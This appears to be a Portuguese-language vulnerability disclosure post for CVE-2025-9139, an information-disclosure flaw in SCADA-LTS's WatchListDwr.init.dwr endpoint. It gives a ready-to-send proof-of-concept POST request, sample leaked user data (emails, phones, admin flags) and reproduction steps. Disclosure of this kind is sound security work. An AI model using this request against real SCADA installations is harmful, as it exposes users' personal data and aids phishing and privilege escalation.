Featured image of post CVE-2025-9139

CVE-2025-9139

Controle de Acesso Quebrado (Enumeração de Usuários)

CVE-2025-9139: Divulgação de informações confidenciais do usuário por meio do endpoint WatchListDwr.init.dwr

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-9139

Resumo

Uma vulnerabilidade foi identificada no endpoint WatchListDwr.init.dwr do SCADA-LTS que permite que qualquer usuário autenticado, mesmo com permissões mínimas, acesse informações confidenciais do usuário, incluindo nomes de usuário, e-mails, números de telefone e status de administrador. Esta falha constitui um problema de Divulgação de Informações e pode ser usada para facilitar ataques futuros, como phishing, escalonamento de privilégios ou engenharia social.

Detalhes

  • Endpoint vulnerável: POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr
  • Autenticação necessária: Sim (usuário com privilégios baixos)
  • Parâmetro afetado: N/A (chamada DWR estática)
  • Tipo de impacto: Divulgação de informações

Ao emitir uma solicitação POST elaborada para o endpoint vulnerável, um usuário com privilégios baixos consegue recuperar Informações detalhadas de todos os usuários do sistema. O backend responde com um objeto JavaScript completo contendo dados como nomes de usuário, e-mails, sinalizadores de administrador e números de telefone.

Exemplo de solicitação:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr HTTP/1.1
Host: kubernetes.docker.internal:8080
Content-Type: text/plain

callCount=1
page=/Scada-LTS/watch_list.shtm
httpSessionId=
scriptSessionId=XYZ123456789
c0-scriptName=WatchListDwr
c0-methodName=init
c0-id=0
batchId=1

Exemplo de snippet de resposta::

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
javascript
s7.admin=true;
s7.email="admin@yourMangoDomain.com";
s7.username="admin";

s8.admin=false;
s8.email="anonymous@mail.com";
s8.username="anonymous";

s11.admin=false;
s11.email="user1@x.com";
s11.phone="13212313131";
s11.username="user1";

PoC

Autentique como qualquer usuário válido com poucos privilégios.

Envie a solicitação POST acima para /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr

Observe a resposta do servidor contendo informações confidenciais de todos os usuários do sistema SCADA.

Impacto

  • Violação de Privacidade: E-mails, números de telefone e nomes de usuário de todos os usuários, incluindo administradores, são expostos.
  • Suporte para Escalação de Privilégios: O conhecimento dos nomes de usuário e funções dos administradores pode ser utilizado em ataques futuros.
  • Phishing e Engenharia Social: Informações de contato expostas podem ser usadas para criar ataques altamente direcionados.
  • Reconhecimento: Os invasores podem mapear a estrutura de usuários do sistema SCADA-LTS para posterior exploração.

Referência

https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-9139.md

Localizador

Natan Maia Morette

Por: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy